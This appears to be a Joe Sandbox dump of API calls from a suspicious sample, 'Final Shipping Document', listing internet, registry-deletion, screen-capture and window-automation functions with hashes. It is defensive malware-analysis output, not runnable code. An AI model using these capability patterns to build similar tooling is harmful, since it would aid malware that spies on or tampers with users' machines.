                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                            • String ID:
                                                            • API String ID: 3800310941-3916222277
                                                            • Opcode ID: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                            • Instruction ID: 877502e33412a9674532a65e17646927b15894f8579639fddd8a2e966813764d
                                                            • Opcode Fuzzy Hash: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                            • Instruction Fuzzy Hash: B0513AB1540208BFDB218F65C9C8BBF7BBDEB0A754F004419F956E6210DB34EA84AB60
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C38592
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385A2
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385AD
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385BA
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385C8
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385D7
                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E0
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E7
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385F8
                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C3FC38,?), ref: 00C38611
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C38621
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00C38641
                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C38671
                                                            • DeleteObject.GDI32(?), ref: 00C38699
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C386AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                            • Instruction ID: 58b6dd401ccec6fa8b0ee3be4bb1eb067f5a31db876c04bddb644f213d326417
                                                            • Opcode Fuzzy Hash: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                            • Instruction Fuzzy Hash: 46412875610208AFDB119FA5CC89FAF7BB8FF89B11F108059F915E7260DB319A05DB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 00C11502
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C1150B
                                                            • VariantClear.OLEAUT32(?), ref: 00C11517
                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C115FB
                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00C11657
                                                            • VariantInit.OLEAUT32(?), ref: 00C11708
                                                            • SysFreeString.OLEAUT32(?), ref: 00C1178C
                                                            • VariantClear.OLEAUT32(?), ref: 00C117D8
                                                            • VariantClear.OLEAUT32(?), ref: 00C117E7
                                                            • VariantInit.OLEAUT32(00000000), ref: 00C11823
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 1234038744-3931177956
                                                            • Opcode ID: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                            • Instruction ID: 63cec1f56a1cf3c24d126d50ad4a6ae5f36b218ed84ba707115adec0662e8d8e
                                                            • Opcode Fuzzy Hash: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                            • Instruction Fuzzy Hash: FDD11531A00119DBCB109F65D884BFDB7F6BF46700F188095FA56AB180DB78DD80EB92
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2B6F4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2B772
                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C2B80A
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2B87E
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2B89C
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2B8F2
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2B904
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2B922
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C2B983
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2B994
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 146587525-4033151799
                                                            • Opcode ID: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                            • Instruction ID: e728d59b44ad61e70c00fb147a64a07fccf3b152c4fd47685b07e4c17a5f94b8
                                                            • Opcode Fuzzy Hash: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                            • Instruction Fuzzy Hash: B6C1AC34208211AFD714DF24D495F2ABBE5FF85308F14849CF5AA8B6A2CB31ED45CB91
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00C225D8
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C225E8
                                                            • CreateCompatibleDC.GDI32(?), ref: 00C225F4
                                                            • SelectObject.GDI32(00000000,?), ref: 00C22601
                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C2266D
                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C226AC
                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C226D0
                                                            • SelectObject.GDI32(?,?), ref: 00C226D8
                                                            • DeleteObject.GDI32(?), ref: 00C226E1
                                                            • DeleteDC.GDI32(?), ref: 00C226E8
                                                            • ReleaseDC.USER32(00000000,?), ref: 00C226F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 1c408d801324a0155644dfcf58cdb999c6e6cba77de815003793959e9af9e748
                                                            • Instruction ID: d9c3d8764872d0bed250352a0da5b2ecf236cbb56823d4d0eb9d3bca2b23d0b8
                                                            • Opcode Fuzzy Hash: 1c408d801324a0155644dfcf58cdb999c6e6cba77de815003793959e9af9e748
                                                            • Instruction Fuzzy Hash: 4261E276D00219EFCF14CFA8D884AAEBBF6FF48310F208529E955A7250D774A951DFA0
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00BDDAA1
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD659
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD66B
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD67D
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD68F
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6A1
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6B3
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6C5
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6D7
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6E9
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6FB
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD70D
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD71F
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD731
                                                            • _free.LIBCMT ref: 00BDDA96
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDDAB8
                                                            • _free.LIBCMT ref: 00BDDACD
                                                            • _free.LIBCMT ref: 00BDDAD8
                                                            • _free.LIBCMT ref: 00BDDAFA
                                                            • _free.LIBCMT ref: 00BDDB0D
                                                            • _free.LIBCMT ref: 00BDDB1B
                                                            • _free.LIBCMT ref: 00BDDB26
                                                            • _free.LIBCMT ref: 00BDDB5E
                                                            • _free.LIBCMT ref: 00BDDB65
                                                            • _free.LIBCMT ref: 00BDDB82
                                                            • _free.LIBCMT ref: 00BDDB9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: a393b98b9347255d43ac8206d6fab5d9af89111889d8ce3854470f674872c004
                                                            • Instruction ID: e223bb26a51d9ea730e9cc9c2287456d3a94fc1fb92a36635a21e916effad5ef
                                                            • Opcode Fuzzy Hash: a393b98b9347255d43ac8206d6fab5d9af89111889d8ce3854470f674872c004
                                                            • Instruction Fuzzy Hash: DE315A356046459FEB21AB38E845B6AF7E8FF10314F1584ABE489D7391FA34AC409B20
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C0369C
                                                            • _wcslen.LIBCMT ref: 00C036A7
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C03797
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C0380C
                                                            • GetDlgCtrlID.USER32(?), ref: 00C0385D
                                                            • GetWindowRect.USER32(?,?), ref: 00C03882
                                                            • GetParent.USER32(?), ref: 00C038A0
                                                            • ScreenToClient.USER32(00000000), ref: 00C038A7
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C03921
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C0395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                            • String ID: %s%u
                                                            • API String ID: 4010501982-679674701
                                                            • Opcode ID: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                            • Instruction ID: 8de6e12f5f6a555d261b9e6daa6b5b5c8c73d761f517ce660d75ff8fe8af9335
                                                            • Opcode Fuzzy Hash: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                            • Instruction Fuzzy Hash: CE918C71204646AFDB19DF24C885FAAB7ECFF44350F008629F9A9D21D1DB30EA55CBA1
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C04994
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C049DA
                                                            • _wcslen.LIBCMT ref: 00C049EB
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C049F7
                                                            • _wcsstr.LIBVCRUNTIME ref: 00C04A2C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04A64
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C04A9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04AE6
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C04B20
                                                            • GetWindowRect.USER32(?,?), ref: 00C04B8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 1311036022-1241985126
                                                            • Opcode ID: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                            • Instruction ID: 4a447998a54827e620849f869387d999732e62eec11d0ac52c9e8562a894913a
                                                            • Opcode Fuzzy Hash: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                            • Instruction Fuzzy Hash: 5A919CB21082059BDB18DF14C985FAB77E8FF84354F048469FE959A0D6EB30EE45CBA1
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C38D5A
                                                            • GetFocus.USER32 ref: 00C38D6A
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00C38D75
                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C38E1D
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C38ECF
                                                            • GetMenuItemCount.USER32(?), ref: 00C38EEC
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C38EFC
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C38F2E
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C38F70
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C38FA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                            • String ID: 0
                                                            • API String ID: 1026556194-4108050209
                                                            • Opcode ID: ac8bfa5c06fec1a6dc38c8a57ed79eccb0d330848b7832dd8f41d22dad1c5974
                                                            • Instruction ID: 54b9bc9255a1a2ce1042d32657c922e723273af9aca3f4d11a6f07f1f21db1a6
                                                            • Opcode Fuzzy Hash: ac8bfa5c06fec1a6dc38c8a57ed79eccb0d330848b7832dd8f41d22dad1c5974
                                                            • Instruction Fuzzy Hash: BC81CF715183019FDB20CF24C884AAFBBE9FF88314F14095DF9A4A7291DB70DA08DBA1
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C0DC20
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C0DC46
• _wcslen.LIBCMT ref: 00C0DC50
• _wcsstr.LIBVCRUNTIME ref: 00C0DCA0
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C0DCBC
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: a7bb65e57b16c2e0734f12502476c8ff8b6837d3e647a36651e3aa9a2ab40f2a
• Instruction ID: 1e9da194bc001b9ec9fae6e88439d88cbd6c5c4957cd897d6885676c58f19095
• Opcode Fuzzy Hash: a7bb65e57b16c2e0734f12502476c8ff8b6837d3e647a36651e3aa9a2ab40f2a
• Instruction Fuzzy Hash: B041DD329402017BEB14ABB49C87FBF77ACEF46710F1000AAF901A61C2EA60DA0197B5
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C2CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD48
  • Part of subcall function 00C2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C2CCAA
  • Part of subcall function 00C2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C2CCBD
  • Part of subcall function 00C2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2CCCF
  • Part of subcall function 00C2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD05
  • Part of subcall function 00C2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2CCF3
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
• Instruction ID: 0e58cf50d1e116c287d4149a66197beb8a184db695e6b8c52b49a2c846b64817
• Opcode Fuzzy Hash: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
• Instruction Fuzzy Hash: EE315A76901129BBDB208B65ECC8FFFBB7CEF45750F000165E916E3240DA749A45ABA0
APIs
• timeGetTime.WINMM ref: 00C0E6B4
  • Part of subcall function 00BBE551: timeGetTime.WINMM(?,?,00C0E6D4), ref: 00BBE555
• Sleep.KERNEL32(0000000A), ref: 00C0E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C0E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C0E727
• SetActiveWindow.USER32 ref: 00C0E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C0E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00C0E773
• Sleep.KERNEL32(000000FA), ref: 00C0E77E
• IsWindow.USER32 ref: 00C0E78A
• EndDialog.USER32(00000000), ref: 00C0E79B
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
• Instruction ID: 3ada18c06d76c8fb49f3d3e6b204ad62943dbf76e9a2c520443a1bd2a4e04ceb
• Opcode Fuzzy Hash: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
• Instruction Fuzzy Hash: 7C21A570250604AFEB106F64ECC9B2D3B6DF754389F140825F91AD11F1DB71AC40EB24
APIs
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0EA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0EA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0EA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0EA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0EAA7
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
• Instruction ID: 4682a41bcde6883a448c531ccc4dc2c5da70cbf21a7ea02c60dceae94b16deac
• Opcode Fuzzy Hash: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
• Instruction Fuzzy Hash: 82113731A9426979D720A762DC8AEFF6ABCEFD6F40F4408797811A20D1EFB05A45C5B0
APIs
• GetDlgItem.USER32(?,00000001), ref: 00C05CE2
• GetWindowRect.USER32(00000000,?), ref: 00C05CFB
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C05D59
• GetDlgItem.USER32(?,00000002), ref: 00C05D69
• GetWindowRect.USER32(00000000,?), ref: 00C05D7B
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C05DCF
• GetDlgItem.USER32(?,000003E9), ref: 00C05DDD
• GetWindowRect.USER32(00000000,?), ref: 00C05DEF
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C05E31
• GetDlgItem.USER32(?,000003EA), ref: 00C05E44
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C05E5A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00C05E67
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
• Instruction ID: ca8fa57b947c29638b57150983c5e5462b3b5107dcc79e2affd03a4a2f926d79
• Opcode Fuzzy Hash: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
• Instruction Fuzzy Hash: BA51FBB5A10619AFDF18CF68DD89BAEBBB9EB48300F148129F915E6290D7709E04CF50
APIs
  • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB8BE8,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8FC5
• DestroyWindow.USER32(?), ref: 00BB8C81
• KillTimer.USER32(00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00BF6973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69A1
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000), ref: 00BF69D4
• DeleteObject.GDI32(00000000), ref: 00BF69E6
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
• Instruction ID: eb75d58a7200ef7ff1b63fcda1c3751f2b41e30eddfcddfcc0b2425ad0b056f4
• Opcode Fuzzy Hash: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
• Instruction Fuzzy Hash: B261DB31012604DFCB259F18C989BBD7BF5FB04312F1884ACEA469B5A0CBB1A8C5DF90
APIs
  • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
• GetSysColor.USER32(0000000F), ref: 00BB9862
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
